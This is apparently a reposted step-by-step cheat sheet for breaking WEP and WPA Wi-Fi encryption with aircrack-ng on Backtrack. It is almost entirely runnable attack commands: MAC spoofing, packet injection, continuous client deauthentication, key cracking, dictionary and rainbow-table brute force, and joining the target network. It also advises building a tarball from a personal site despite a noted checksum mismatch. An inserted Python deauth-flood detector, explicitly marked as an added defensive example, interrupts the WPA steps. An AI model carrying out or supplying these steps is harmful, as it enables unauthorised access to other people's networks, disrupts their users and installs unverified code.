sacktoys | Software and s/w Development

Dec 13, 2013

*******************************************************uv1.4 (10/24/08) | *

* Realised on Backtrack 3.0 Final (compatible BT2.0Final & BT3.0Beta) *

* If you have any suggestions contact ronaak42 (AT) gmail (DOT) com *

* Language: English *

* Copyright: Ronaak *

* NB: Do NOT use these methods to hack another network than your own *

* Help: $_ ==> variable *

*       // ==> comment *

*       [] ==> optional command *

*       /  ==> or this other command *

* Hardware used: Macbook (Intel) with VMware *

*                Alfa AWUS036H (500mA) | Alfa AWUS036s *

*************************************************************************


// for Alfa AWUS036H (500mA):

$_Interface = wlan0

// for Alfa AWUS036s:

// $_Interface = rausb0


1°) Start Backtrack

VMWare ==> BT3 Graphics mode (VESA Mode)

Real Boot ==> BT3 Graphics mode (KDE)


BT2:

Login ==> root

Passwd ==> toor

startx



2°) Config Wifi Card

// for Alfa AWUS036H (500mA) on LINUX (other than BT2 & BT3):

wget http://ronaak.eu/rtl8187_linux_26.1010.zip

unzip rtl8187_linux_26.1010.zip

cd rtl8187_linux_26.1010.0622.2006/

wget http://ronaak.eu/rtl8187_1010.0622v2.patch

tar xzf drv.tar.gz

tar xzf stack.tar.gz

patch -Np1 -i rtl8187_1010.0622v2.patch


// for USB Key:

mkdir usb

mount /dev/sdb usb/

konqueror [&]



[ifconfig $_Interface down]

[macchanger -m $_NEW_@MAC / ifconfig $_Interface hw ether $_NEW_@MAC]

ifconfig $_Interface up / airmon-ng [start $_Interface]

[iwconfig $_Interface mode monitor]



=================================WEP KEY=================================

// This part was tested, but some errors may still be found.



3°) Scan Wifi Network

airodump-ng --write $_Output_File [--channel $_NumberChannel] [--bssid $_@MAC_AP] [--encrypt "WEP/WPA"] $_Interface



4°) Fake authentication

aireplay-ng -1 0 [-e $_ESSID] -a $_@MAC_AP -h $_@MAC_Station $_Interface

==> 0: time elapsed between 2 tries.



5°) Injections of packets

// Connected and validated client NOT needed but recommended


// Injection test

aireplay-ng -9 [-e $_ESSID] [-a $_@MAC_AP] [-i wlan1] wlan0

==> -i wlan1: is the interface name of the second card, if you want to determine which attacks your card supports. This interface acts as an AP and receives packets.

==> wlan0: is the interface name, or the airserv-ng IP address plus port number. This interface is used to send packets. For example 127.0.0.1:666. (Mandatory)

// IMPORTANT: You must set your card to monitor mode and to the desired channel with airmon-ng prior to running any of the tests.


// ARP:

aireplay-ng -3 [-e $_ESSID] -b $_@MAC_AP -h $_@MAC_Station [-x $_Injection_Speed] $_Interface

==> $_Injection_Speed = 600 (default) | Adjust to signal power (be careful, it can bring down the AP)

// Disconnect Current Client:

aireplay-ng -0 1 -a $_@MAC_AP -c $_@MAC_Station $_Interface

==> 1: is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously


// ChopChop (xor):

aireplay-ng -4 -h $_@MAC_Station -b $_@MAC_AP $_Interface

tcpdump -s 0 -n -e -r $_Output_File

packetforge-ng -0 -a $_@MAC_AP -h $_@MAC_Station -k $_@Ip_Station -l $_@Ip_AP -y $_XOR_File -w $_ARP_faked_name

==> -0: type of packet to be forged. 0 for ARP

==> -k: IP found with tcpdump (ex: 192.168.0.3)

==> -l: IP found with tcpdump (ex: 192.168.0.254)

==> -y: output filename of the ChopChop attack (*.xor)

==> -w: output filename that will be generated by packetforge-ng

aireplay-ng -3 [-e $_ESSID] -b $_@MAC_AP -h $_@MAC_Station [-x $_Injection_Speed] -r $_ARP_faked_name $_Interface


// Fragment:

// Same options as the ChopChop attack

aireplay-ng -5 -b $_@MAC_AP -h $_@MAC_Station $_Interface

packetforge-ng -0 -a $_@MAC_AP -h $_@MAC_Station -k $_@Ip_Station -l $_@Ip_AP -y $_XOR_File -w $_ARP_faked_name

aireplay-ng -2 -r $_ARP_faked_name $_Interface


// Natural Packet Replay:

aireplay-ng -2 -b $_@MAC_AP -d FF:FF:FF:FF:FF:FF -t 1 $_Interface

==> -d FF:FF:FF:FF:FF:FF: selects packets with a broadcast destination

==> -t 1: selects packets with the "To Distribution System" flag set on


// Modified Packet Replay:

aireplay-ng -2 -b $_@MAC_AP -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 [-h $_@MAC_Station] $_Interface

==> -c FF:FF:FF:FF:FF:FF: sets the destination MAC address to be a broadcast. This is required to cause the AP to replay the packet and thus get a new IV.

==> -t 1: selects packets with the "To Distribution System" flag set on

==> -p 0841: sets the Frame Control Field such that the packet looks like it is being sent from a wireless client.



6°) IVS

300 000 IVs ==> WEP Key 64 bits

1 000 000 IVs ==> WEP Key 128 bits

3 000 000 IVs ==> WEP Key 256 bits



7°) Crack WEP

aircrack-ng [-n 64/128/256] -x $_Output_File [-f 2-12] [-k] [-0]

==> -0: colours the screen green, Matrix-style

==> -f: fudge factor between 2 and 12 (default: 2)

==> -k: don't activate the chosen Korek attack (between 1 and 17)



8°) PTW

// Efficient if there is a lot of ARP traffic

// 40 000 IVs needed instead of 1 000 000 IVs for a 128-bit WEP key

// with the same options as 7°)

aircrack-ng [-P 1] -z $_Output_File

==> -P: PTW debug mode

==> 1: disable Klein (for Modified Packet Replay)



9°) Connection to AP

iwconfig $_Interface

iwconfig $_Interface mode managed

iwconfig $_Interface key $_Clef_WEP

dhcpcd $_Interface

ping www.google.com

// if no answer, maybe a DNS problem

ping 91.121.147.12

// if no answer either, maybe an IP address problem

wireshark



=================================WPA KEY=================================

// This part was NOT tested, so some errors may be found.



3°) Scan Wifi Network

airodump-ng --write $_Output_File [--channel $_NumberChannel] [--bssid $_@MAC_AP] [--encrypt "WEP/WPA"] $_Interface



4°) Disconnect Current Clients

// Connected and validated client needed

aireplay-ng -0 1 -a $_@MAC_AP -c $_@MAC_Station $_Interface

[aireplay-ng -0 0 -a $_@MAC_AP $_Interface]
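From the defender's side, the deauthentication bursts used in the "Disconnect Current Client" steps of both the WEP and WPA sections (aireplay-ng -0) are easy to spot on a monitor-mode capture: a single deauth from an AP is normal, a burst of them is not. The following is an added example, not part of the original cheat sheet; it assumes raw 802.11 frames with the radiotap header already stripped, timestamps in seconds, and a constructed sample capture rather than a real one.

```python
import struct
from collections import defaultdict

MGMT_TYPE, DISASSOC_SUBTYPE, DEAUTH_SUBTYPE = 0, 10, 12

def mac_str(b):
    return ':'.join('%02x' % x for x in b)

def parse_80211_header(frame):
    """(type, subtype, addr1, addr2) of a raw 802.11 frame with no radiotap header.
    Frame Control byte 0: bits 2-3 = type, bits 4-7 = subtype."""
    fc = frame[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF, mac_str(frame[4:10]), mac_str(frame[10:16])

def build_frame(ftype, subtype, dst, src, bssid):
    """Constructed sample frame (not a capture): FC, duration, addr1..3, seq ctl, no body."""
    fc = (subtype << 4) | (ftype << 2)
    return struct.pack('<BBH', fc, 0, 0) + dst + src + bssid + b'\x00\x00'

def detect_deauth_flood(frames, threshold=5, window=1.0):
    """frames: iterable of (timestamp_seconds, raw_frame). Returns {source_mac: peak number
    of deauth/disassoc frames seen within any `window` seconds} for sources that reach
    `threshold`. aireplay-ng -0 spoofs the AP as the sender, so alerts are keyed on addr2."""
    recent, alerts = defaultdict(list), {}
    for ts, raw in frames:
        ftype, subtype, _dst, src = parse_80211_header(raw)
        if ftype != MGMT_TYPE or subtype not in (DISASSOC_SUBTYPE, DEAUTH_SUBTYPE):
            continue  # data/control frames and other management frames are ignored
        bucket = recent[src]
        bucket.append(ts)
        while ts - bucket[0] > window:  # drop timestamps older than the sliding window
            bucket.pop(0)
        if len(bucket) >= threshold:
            alerts[src] = max(alerts.get(src, 0), len(bucket))
    return alerts

def run_sample():
    """Constructed capture: one legitimate deauth, a few data frames, then a burst."""
    ap, client = bytes.fromhex('001122334455'), bytes.fromhex('aabbccddee01')
    frames = [(0.0, build_frame(0, DEAUTH_SUBTYPE, client, ap, ap))]          # benign single deauth
    frames += [(1.0 + i, build_frame(2, 0, ap, client, ap)) for i in range(3)]  # ordinary data frames
    frames += [(5.0 + 0.05 * i, build_frame(0, DEAUTH_SUBTYPE, client, ap, ap))
               for i in range(10)]                                             # 10 deauths in 0.45 s
    return detect_deauth_flood(frames)

if __name__ == '__main__':
    print(run_sample())  # {'00:11:22:33:44:55': 10}
```

Only the burst trips the alert; the lone deauth at t=0 and the data frames do not, which is the distinction a wireless IDS rule needs to make.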



5°) HandShake Check

aircrack-ng $_Output_File



6°) Install Dictionary for BruteForce

// Internet needed, or have the file downloaded beforehand ==> lower.gz (or another brute-force dictionary)

cd /root

[wget http://ronaak.eu/lower.gz]

zcat lower.gz | egrep -v '^#' > dico.txt

// to type the ">" symbol, switch the keyboard to US and press Shift + >



7°) BF WPA (many hours needed xD)

aircrack-ng -w /root/dico.txt [-0] $_Output_File




8°) Rainbow tables (if step 7° failed)

// This functionality will be available in a future release. It is NOT available currently.

// Internet needed, or have the file downloaded beforehand ==> aircrack-ng-1.0-beta2.tar.gz

// 3 files are needed:

// $_Output_File (.cap) containing the handshake

// dico.txt containing the list of passwords for brute force

// a file named essid.txt containing the AP's ESSID (with only one row | to pre-compute a table for many ESSIDs, put one ESSID per row in this file)


Old method:

// still operational?

cd /root

svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng

cd aircrack-ng

make SQLITE=true

make SQLITE=true install


New method:

// ERROR 404: NOT FOUND for this URL:

wget http://download.aircrack-ng.org/aircrack-ng-1.0-beta2.tar.gz

// Or you can try this:

// Be careful ==> bad checksum 997d5623893a18e5d392fb5f36cae805 instead of 66017aad4f23153419fdb04c83e65aaf

// Downloaded from http://www.stsp.name/openbsd/ports/aircrack-ng-1.0-beta2.tar.gz

wget http://ronaak.eu/aircrack-ng-1.0-beta2.tar.gz

tar -zxvf aircrack-ng-1.0-beta2.tar.gz

cd aircrack-ng-1.0-beta2

make

make install

make SQLITE=true

make SQLITE=true install


cd /root

airolib-ng crackwpa --import passwd /root/dico.txt

airolib-ng crackwpa --import essid /root/essid.txt

airolib-ng crackwpa --stats

airolib-ng crackwpa --clean all

// Lots of RAM & time needed xD

airolib-ng crackwpa --batch

// Lots of RAM & time needed, but the result is saved xD

[airolib-ng crackwpa --verify all]


==> crack WPA:

// very fast ==> 17000 pwd/s ;)

aircrack-ng -r crackwpa $_Output_File



9°) Connection to AP

iwconfig $_Interface

iwconfig $_Interface mode managed

// Probably not the right command:

iwconfig $_Interface key $_Clef_WPA

dhcpcd $_Interface

ping www.google.com

// if no answer, maybe a DNS problem

ping 91.121.147.12

// if no answer either, maybe an IP address problem

wireshark